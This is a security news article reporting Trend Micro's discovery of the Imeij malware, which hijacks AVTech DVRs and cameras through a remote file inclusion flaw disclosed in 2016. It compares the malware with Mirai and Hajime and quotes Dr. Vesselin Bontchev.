A new malware strain named Imeij has been detected in the wild targeting equipment made by Taiwanese manufacturer AVTech. According to Trend Micro researchers, the malware is exploiting a security flaw which AVTech engineers failed to patch in October 2016.
The news of a new IoT malware rearing its ugly head isn't such a big surprise anymore. Over the past year, IoT malware has helped crooks build massive botnets, which they often used to launch DDoS attacks of epic proportions.
While for many years the GafGyt malware strain dominated the IoT malware landscape, in 2016, new threats rose to power, such as Mirai, LuaBot, Rex, PNScan, LizardStresser, Hajime, and others.
Compared to 2016, 2017 was a little bit tamer, with fewer new IoT threats than last year, with most malware authors investing into improving their already existing threats.
The first major IoT malware discovered this year is ELF_IMEIJ.A, aka Imeij, spotted by Trend Micro researchers and made public last week.
According to researchers, this malware isn't as sophisticated as its counterparts, as it only includes exploits for one vulnerability.
That particular vulnerability was publicly disclosed in October 2016 by security researchers from Search-Lab, who after months of trying and failing to get in contact with Taiwanese vendor AVTech, decided to go public with 14 security flaws they found in the firmware of AVTech devices.
Five months later, one of the 14 flaws was integrated in the Imeij malware, which uses it to take over AVTech equipment and add the hijacked devices to its DDoS botnet.
That particular vulnerability is a remote file inclusion (RFI) that can be triggered by accessing a CGI script belonging to the AVTech Cloud service, included in the firmware of various devices, such as DVRs, IP cameras, and other CCTV equipment.
The RFI exploit forces the device into downloading the Imeij malware binary from three IPs registered to a South Korean ISP. Over 130,000 AVTech devices are currently exposed online.
The malware, which only targets Linux-based ARM devices, works by gathering info on the infected device, sending it to a remote server, and launching DDoS attacks on demand. A last feature allows the botnet operator to clean the device and remove the malware, if he chooses to.
In recent months, after the Mirai author released his malware's source code online, most of the IoT malware landscape has been flooded with Mirai variants.
There is no connection between Mirai and the new Imeij malware, according to Trend Micro researchers. Mirai targets multiple IoT platforms running BusyBox and is self-spreading via a built-in brute-forcing function.
Imeij is spread by the author, who searches AVTech devices and uses a flaw in the device's built-in web server CGI module. Mirai also targets more brands than just AVTech and also uses the 5555, 7547, and 48101 ports to operate. On the other hand, Imeij only uses port 39999.
Bleeping Computer spoke with malware expert Dr. Vesselin Bontchev, who says that despite the familiar sounding name, Imeij has nothing in common with Hajime, a malware family spotted for the first time in mid-October last year.
"Hajime is a worm. It self-replicates from one infected host to another," Dr. Bontchev said. "This thing [Imeij] uses a command-and-control server which sends the bot to the host it is trying to infect, taking the bot from a repository."
"Hajime uses the name '.i' for its ARM executable," he added. "This thing uses 'Arm1'. [...] If I have to guess, I'd say that it belongs to a different family."
Recently, Dr. Bontchev has been keeping an eye on Hajime versions, which are now very different from the versions first released in October last year. According to Cybereason researchers, recent Hajime versions are modifying local firewall rules to keep other IoT malware out and prolong its stay on the infected device.